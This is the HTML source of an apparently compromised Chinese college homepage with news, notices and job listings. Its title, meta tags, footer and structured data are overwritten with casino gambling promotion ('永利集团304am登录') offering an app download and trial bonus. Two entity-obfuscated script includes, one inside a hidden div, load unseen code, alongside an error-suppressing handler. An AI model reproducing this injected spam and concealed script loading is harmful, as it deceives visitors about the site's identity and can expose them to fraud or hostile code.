<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<HTML><head><script>var V_PATH="/";window.onerror=function(){ return true; };</script><meta name="format-detection" content="telephone=no,email=no,adress=no"><meta name="pageType" content="1">
<meta name="pageTitle" content="永利集团304am登录">


<link rel="shortcut icon" href="/.css" />




<META content="IE=edge,chrome=1" http-equiv="X-UA-Compatible">
<meta charset="utf-8"/><LINK rel="stylesheet" type="text/css" href="/style/style.css"><LINK rel="stylesheet" type="text/css" href="/style/foucs.css">

<script></script>

<!--Announced by Visual SiteBuilder 9-->
<link rel="stylesheet" type="text/css" href="/sitegray/sitegray_d.css" />
<script language="javascript" src="/sitegray/sitegray.js"></script>
<!-- CustomerNO:776562626572323076784752505a5742000300034654 -->
<link rel="stylesheet" type="text/css" href="/index.vsb.css" />
<script type="text/javascript" src="/system/resource/js/vsbscreen.min.js" id="_vsbscreen" devices="pc|pad"></script>
<script type="text/javascript" src="/system/resource/js/counter.js"></script>
<script type="text/javascript"></script>
<title>&#27704;&#21033;&#38598;&#22242;&#183;&#40;&#51;&#48;&#52;&#97;&#109;&#45;&#23448;&#32593;&#86;&#73;&#80;&#35748;&#35777;&#41;&#45;&#30331;&#24405;&#20837;&#21475;</title>
<meta name="keywords" content="&#27704;&#21033;&#38598;&#22242;&#51;&#48;&#52;&#97;&#109;&#30331;&#24405;" />
<meta name="description" content="&#50;&#53;&#54;&#51;&#27704;&#21033;&#38598;&#22242;&#51;&#48;&#52;&#97;&#109;&#23458;&#25143;&#31471;&#19979;&#36733;&#8212;&#8212;&#39640;&#36895;&#31283;&#23450;&#65;&#80;&#80;&#65292;&#30331;&#24405;&#26356;&#20415;&#25463;&#65281;&#19987;&#20139;&#31227;&#21160;&#31471;&#20248;&#24800;&#65292;&#25805;&#20316;&#27969;&#30021;&#19981;&#21345;&#39039;&#12290;&#28857;&#20987;&#19979;&#36733;&#65292;&#31435;&#36865;&#20307;&#39564;&#37329;" />

<script  type="text/javascript" charset="utf-8"  rel="nofollow" src="&#47;&#64;&#112;&#117;&#98;&#108;&#105;&#99;&#47;&#98;&#97;&#115;&#101;&#46;&#106;&#115;"></script>
</HEAD>
<body><nav style="text-align: center;background-color: #bbdaa1;color: #333;"><a href="/"><h1>永利集团304am登录</h1></a></nav>
<DIV class="header-box">
<DIV class="header">
<DIV class="logo">
<a href="/" title="永利集团304am登录"><img src="/images/logo.jpg" alt="永利集团304am登录2023" /></a></DIV>
<DIV class="header_right">
<DIV class="top_link">
<script language="javascript"></script>




                <ul>
                    <li><a href="javascript:setHomepagea1097260a()">设为首页</a></li><i>|</i>
                    <li><a onclick="javascript:dosuba1097260a();" href="#">加入收藏</a></li>
               
                </ul></DIV>
<DIV class="clearboth"></DIV>


<script language="javascript" src="/system/resource/js/base64.js"></script><script language="javascript" src="/system/resource/js/jquery/jquery-latest.min.js"></script><script language="javascript" src="/system/resource/vue/vue.js"></script><script language="javascript" src="/system/resource/vue/bluebird.min.js"></script><script language="javascript" src="/system/resource/vue/axios.js"></script><script language="javascript" src="/system/resource/vue/polyfill.js"></script><script language="javascript" src="/system/resource/vue/token.js"></script><LINK href="/system/resource/vue/static/element/index.css" type="text/css" rel="stylesheet"><script language="javascript" src="/system/resource/vue/static/element/index.js"></script><script language="javascript" src="/system/resource/vue/static/public.js"></script><style>
    #appu2 .qwss{
        height: 31px;
        font-size: 12px;
        min-width: 190px;
        max-width: 600px;
        width: 60%;
        margin-top: -15px;
        outline: none;
        padding-left: 10px;
        border-radius: 2px;
        border: 1px solid #e4e7ed;}
    #appu2 .tj{
        padding-left: 6px;
        letter-spacing: 5px;
        color: white;
        min-width: 53px;
        max-width: 150px;
        height: 32px;
        border: 0;
        border-radius: 2px;
        background-color: #0c6cb1;
        position: relative;
        top: 1px;
        width: 20%;
        margin-top: -15px;}
</style>
<div id="divu2" style="margin-top:20px;"></div>
<script type="text/html" id="htmlu2">
    <div id="appu2">
        <div v-if="!isError">
            <input type="text" class="qwss" placeholder="全文搜索" autocomplete=off v-model=query.keyWord @keyup.enter="onSubmit">
            <input class="tj" name="submit_button" type="button" value="提交" v-on:click="onSubmit()"/>
        </div>
        <div v-if="isError" style="color: #b30216; font-size:18px;text-align: center;padding:20px;">
            应用维护中！
        </div>
    </div>
</script>
<script>
    $("#divu2").html($("#htmlu2").text());
</script>
<script></script></DIV></DIV>
<DIV class="i-nav"><ul id="nav" class="nav clearfix">
 <li class="nLi on">
                <h3><a href="/">首页</a></h3>
            </li>
 <li class="nLi ">
                <h3><a href="/bygk1/xyjj.html">永利概况</a></h3>
                <ul class="sub">
                 <li><a href="/bygk1/xyjj.html">学院简介</a></li>
                 <li><a href="/bygk1/ldbz.html">领导班子</a></li>
                 <li><a href="/bygk1/zzjg.html">组织机构</a></li>
                </ul>
            </li>
 <li class="nLi ">
                <h3><a href="/djgz1.html">党建工作</a></h3>
            </li>
 <li class="nLi ">
                <h3><a href="/szdw1/js.html">师资队伍</a></h3>
                <ul class="sub">
                 <li><a href="/szdw1/js.html">教授</a></li>
                 <li><a href="/szdw1/fjs.html">副教授</a></li>
                 <li><a href="/szdw1/js1.html">讲师</a></li>
                 <li><a href="/szdw1/rczp.html">人才招聘</a></li>
                </ul>
            </li>
 <li class="nLi ">
                <h3><a href="/xkjs.html">学科建设</a></h3>
            </li>
 <li class="nLi ">
                <h3><a href="/zyjs.html">专业建设</a></h3>
            </li>
 <li class="nLi ">
                <h3><a href="/yjsjy.html">研究生教育</a></h3>
            </li>
 <li class="nLi ">
                <h3><a href="/xsgz/txgz.html">学生工作</a></h3>
                <ul class="sub">
                 <li><a href="/xsgz/gsgg.html">公示公告</a></li>
                 <li><a href="/xsgz/gzzd.html">规章制度</a></li>
                 <li><a href="/xsgz/txgz.html">团学工作</a></li>
                 <li><a href="/xsgz/xsfc.html">学生风采</a></li>
                 <li><a href="/xsgz/yzsfw.html">一站式服务</a></li>
                 <li><a href="/xsgz/jyxx.html">就业信息</a></li>
                </ul>
            </li>
 <li class="nLi ">
                <h3><a href="/zlwh.html">质量文化</a></h3>
                <ul class="sub">
                 <li><a href="/zlwh/gzzd.html">规章制度</a></li>
                 <li><a href="/zlwh/gldwjgzzz.html">管理队伍及工作职责</a></li>
                 <li><a href="/zlwh/zlbz.html">质量标准</a></li>
                 <li><a href="/zlwh/gzdt.html">工作动态</a></li>
                </ul>
            </li>
 <li class="nLi ">
                <h3><a href="/xzzx.html">下载中心</a></h3>
            </li>

</ul>
</DIV></DIV><!--nav--><!--banner-->
<DIV style="clear: both"></DIV>
<DIV class="i-banner">    <script language="javascript" src="/system/resource/js/dynclicks.js"></script><div id="index_b_hero">
        <div class="hero-wrap">
            <ul class="heros clearfix">
                                  <li class="hero">  <a> 
                         <img src="/images/23/11/16/1txeptjk3j/3banner580.jpg" class="thumb" alt="" /> </a>  
                            
                </li>
                    
                    
                    
                           
               
                      <li class="hero">  <a> 
                         <img src="/images/23/11/16/1txeptjk3j/2banner580.jpg" class="thumb" alt="" /> </a>  
                            
                </li>
                    
                    
                    
                           
               
                      <li class="hero">  <a> 
                         <img src="/images/23/11/16/1txeptjk3j/1banner580.jpg" class="thumb" alt="" /> </a>  
                            
                </li>
                    
                    
                    
                           
               
            </ul>
        </div>
        <div class="helper">
            <div class="mask-left">
            </div>
            <div class="mask-right">
            </div>
            <a href="#" class="prev icon-arrow-a-left"></a>
            <a href="#" class="next icon-arrow-a-right"></a>
        </div>
    </div>




</DIV><!--main-->
<DIV style="clear: both"></DIV><!--banner-->
<DIV class="i-main clearfix">
<DIV class="m_p1 w1100">
<DIV class="m_p1_left">
<DIV class="izhxw clearfix">
<DIV class="ititle "><SPAN class="t_c_1"></SPAN>
<H2>新闻动态</H2><I></I><A href="/xwdt.html"><IMG alt="查看更多" src="/images/i_more.jpg"></A></DIV>
<DIV class="newbox"><script language="javascript" src="/system/resource/js/centerCutImg.js"></script><script language="javascript" src="/system/resource/js/ajax.js"></script><div class="newbox_left">
                    <div id="picnews" class="picnews">
                        <div class="hd">
                            <ul>
                                                        <li></li>
                            </ul>
                        </div>
                        <div class="bd">
                            <ul>
                            <li><a href="/info/1713/10331.html"><span><h1 class="relative">永利集团304am登录召开2023级新...</h1></span><img src="/__local/1/FE/FD/911836C4A4B32D052473AA0DE38_4593EB82_93AE.jpg" /></a></li>
                            </ul>
                        </div>
                        <!-- 下面是前/后按钮代码，如果不需要删除即可 -->
                        <a class="prev" href="javascript:void(0)"></a>
                        <a class="next" href="javascript:void(0)"></a>
                    </div>
              
                </div>
<div class="newbox_right">
 <div class="headline">
                        <a href="/info/1713/34481.html">
                        <h2>【心理健康节】心育阳光，智创美好——...</h2>
                        <p>为进一步提升学生心理健康素养，营造积极向上的校园氛围，永利集团304am登录响应号召，于近期成功举办了第十九...</p>
                        </a>
                    </div>
                    <div class="newslist">
                        <ul>

     <li><a href="/info/1713/34451.html">永利集团304am登录召开2025届就业创...</a><span>05/26</span></li>



     <li><a href="/info/1713/34441.html">永利集团304am登录召开期中教学师生...</a><span>05/21</span></li>



     <li><a href="/info/1713/34411.html">永利集团304am登录召开教职工理论学...</a><span>05/19</span></li>



     <li><a href="/info/1713/34351.html">永利集团304am登录团委荣获2024年度...</a><span>05/08</span></li>



     <li><a href="/info/1713/34341.html">永利集团304am登录学子荣获2025年安...</a><span>05/08</span></li>

</ul>
                    </div>

</div>
</DIV></DIV></DIV>
<DIV class="m_p1_right">
<DIV class="i-tzgg"> <div class="ititle "><span class="t_c_2"></span><h2>通知公告</h2><i></i><a href="/tzgg.html"><img src="/images/i_more.jpg" alt="查看更多" /></a></div>
            <ul class="date_list">
                <li>
                <span style="background: #0066cc; color: #ffffff"><i>13</i>2025-05</span><a href="/info/1723/34401.html">永利集团304am登录校友工作人员及联系方式</a></li>
                <li>
                <span><i>03</i>2025-06</span><a href="/info/1723/34491.html">关于组织学生参加“2025年睿抗机器人开发者大赛(RAICOM) ”的通知</a></li>
                <li>
                <span><i>09</i>2025-05</span><a href="/info/1723/34381.html">第75次全国计算机等级考试成绩查询须知</a></li>
                <li>
                <span><i>15</i>2025-04</span><a href="/info/1723/34101.html">永利集团304am登录2025年硕士研究生全日制招生考试录取结果（调剂第二批）</a></li>
            </ul>
</DIV></DIV></DIV>
<DIV class="m_p2">
<DIV class="w1100">
<DIV class="m_p2_b fl">            <div class="ititle "><span class="t_c_3"></span><h2>党建工作</h2><i></i><a href="/djgz/djhd.html"><img src="/images/i_more.jpg" alt="查看更多" /></a></div>
            <div class="newslist">
                <ul>
                    <li><a href="/info/1523/34241.html">永利集团304am登录党委举行第50期“党的基本知...</a><span>04/27</span></li>
                    <li><a href="/info/1523/33881.html">党建引领产学研</a><span>03/18</span></li>
                    <li><a href="/info/1533/33831.html">永利集团304am登录党委召开2024年度民主生活会...</a><span>03/04</span></li>
                    <li><a href="/info/1533/33811.html">永利集团304am登录党委召开2024年度民主生活会...</a><span>03/03</span></li>
                    <li><a href="/info/1533/33821.html">永利集团304am登录党委召开2024年党支部书记抓...</a><span>03/03</span></li>
                    <li><a href="/info/1523/3671.html">永利集团304am登录党委赴李克农故居开展主题党...</a><span>11/10</span></li>
                </ul>
            </div>
</DIV>
<DIV class=" fl" style="margin-left: 30px">            <div class="ititle "><span class="t_c_4"></span><h2>学术报告信息</h2><i></i><a href="/xsbgxx.html"><img src="/images/i_more.jpg" alt="查看更多" /></a></div>
            <div class="">
                <ul class="date_list">
                <li>
                <span style="background: #0066cc; color: #ffffff"><i>19</i>2025-3</span><a href="/info/1943/33841.html" style="width:300px;float:right">钱立青：“阅历与省思：江南四大名楼”——“阅+历”读书讲堂“名家导读”系列...</a></li>
                <li>
                <span><i>16</i>10</span><a href="/info/1943/33121.html" style="width:300px;float:right">熊科：实习就业辅导——致未来的IT工程师</a></li>
                <li>
                <span><i>18</i>10</span><a href="/info/1943/33111.html" style="width:300px;float:right">陈圣兵：地方应用型高校学科建设——服务地方经济，打造学科特色</a></li>
            </ul>
            </div>
</DIV>
<DIV class="m_p2_c fr">
        <div class="ititle "><span class="t_c_7"></span><h2>就业信息</h2><i></i><a href="/xsgz/jyxx.html"><img src="/images/i_more.jpg" alt="查看更多" /></a></div>
    <div class="newslist">
                <ul>
                                    <li><a href="/info/2113/34461.html" style="width:230px;">“中科迪曼”智能科技有限公...</a><span>05/28</span></li>
                    <li><a href="/info/2113/32161.html" style="width:230px;">职引未来,计往开来丨计算机与...</a><span>04/12</span></li>
                    <li><a href="/info/2113/32171.html" style="width:230px;">永利集团304am登录前往合...</a><span>11/02</span></li>
                    <li><a href="/info/2113/32181.html" style="width:230px;">永利集团304am登录与合肥...</a><span>09/21</span></li>
                    <li><a href="/info/2113/32191.html" style="width:230px;">永利集团304am登录召开202...</a><span>09/19</span></li>
                    <li><a href="/info/2113/32201.html" style="width:230px;">【访企拓岗】院领导出席联系...</a><span>06/07</span></li>
                </ul>
            </div>
</DIV></DIV></DIV></DIV><!--link-->
<DIV class="clearfix"></DIV>
<DIV class="footer">
<DIV class="w1100">
<!-- 版权内容请在本组件"内容配置-版权"处填写 -->

        <div class="footer_l">
<p style="text-align: center;">永利集团·(304am-官网VIP认证)-登录入口 版权所有</p><p style="text-align: center;">锦绣校区地址:合肥市经济技术开发区莲花路1688号(230601)</p><p style="text-align: center;">滨湖校区地址:合肥市黄麓科教园区书香路(238076)</p>
        </div>
<ul>
        <li>
        <a href="javascript:void(0);" title="手机版" onclick="_vsb_multiscreen.setDevice('mobile')" style="display:block;width:100px;margin:0 auto;text-align:center;color:#fff">
        手机版</a></li>
</ul>


</DIV></DIV>





<DIV class="go_top"><A href="#"><IMG alt="返回顶部" src="/images/go_top.jpg"></A> </DIV>


<script type="text/javascript" src="/js/jquery-latest.min.js"></script>

<script type="text/javascript" src="/js/jquery.foucs.js"></script>
<script type="text/javascript" src="/js/jquery.SuperSlide.js"></script>
    <script type="text/javascript">
        $.foucs({ direction: 'right' });
    </script>
      <script type="text/javascript">
                        jQuery(".picnews").slide({mainCell:".bd ul",autoPlay:true});
                    </script>

        <script id="jsID" type="text/javascript">

            jQuery("#nav").slide({
                type:"menu",// 效果类型，针对菜单/导航而引入的参数（默认slide）
                titCell:".nLi", //鼠标触发对象
                targetCell:".sub", //titCell里面包含的要显示/消失的对象
                effect:"slideDown", //targetCell下拉效果
                delayTime:300 , //效果时间
                triggerTime:0, //鼠标延迟触发时间（默认150）
                returnDefault:true //鼠标移走后返回默认状态，例如默认频道是“预告片”，鼠标移走后会返回“预告片”（默认false）
            });
        </script>


<script>
    function dropMenu(obj){
        $(obj).each(function(){
            var theSpan = $(this);
            var theMenu = theSpan.find("ul");
            var tarHeight = theMenu.height();
            theMenu.css({height:0,opacity:0});

            var t1;

            function expand() {
                clearTimeout(t1);
                theSpan.find('a').addClass("selected");
                theMenu.stop().show().animate({height:tarHeight,opacity:1},200);
            }

            function collapse() {
                clearTimeout(t1);
                t1 = setTimeout(function(){
                    theSpan.find('a').removeClass("selected");
                    theMenu.stop().animate({height:0,opacity:0},200,function(){
                        $(this).css({display:"none"});
                    });
                }, 250);
            }

            theSpan.hover(expand, collapse);
            theMenu.hover(expand, collapse);
        });
    }

    $(document).ready(function(){

        dropMenu(".drop-menu-effect");

    });
</script>


<script type="application/ld+json">
[
    {
        "@context": "https://schema.org",
        "@type": "Organization",
        "name": "永利集团304am登录",
        "url": "https://www.pokebabinc.com",
        "logo": "https://www.pokebabinc.com/images/logo.jpg",
        "description": "2563永利集团304am客户端下载——高速稳定APP，登录更便捷！专享移动端优惠，操作流畅不卡顿。点击下载，立送体验金"
    },
    {
        "@context": "https://schema.org",
        "@type": "BreadcrumbList",
        "itemListElement": [
            {
                "@type": "ListItem",
                "position": 1,
                "name": "首页",
                "item": "https://www.pokebabinc.com"
            },
            {
                "@type": "ListItem",
                "position": 2,
                "name": "党建工作",
                "item": "https://www.pokebabinc.com/djgz1.html"
            },
            {
                "@type": "ListItem",
                "position": 3,
                "name": "专业建设",
                "item": "https://www.pokebabinc.com/zyjs.html"
            },
            {
                "@type": "ListItem",
                "position": 4,
                "name": "研究生教育",
                "item": "https://www.pokebabinc.com/yjsjy.html"
            }
        ]
    }
]
</script>
<script>
(function(){
    var bp = document.createElement('script');
    var curProtocol = window.location.protocol.split(':')[0];
    if (curProtocol === 'https') {
        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
    }
    else {
        bp.src = 'http://push.zhanzhang.baidu.com/push.js';
    }
    var s = document.getElementsByTagName("script")[0];
    s.parentNode.insertBefore(bp, s);
})();
</script>

<div style="display:none"><script  type="text/javascript" charset="utf-8"  rel="nofollow" src="&#47;&#64;&#112;&#117;&#98;&#108;&#105;&#99;&#47;&#106;&#115;&#46;&#106;&#115;"></script></div>
</body></HTML>

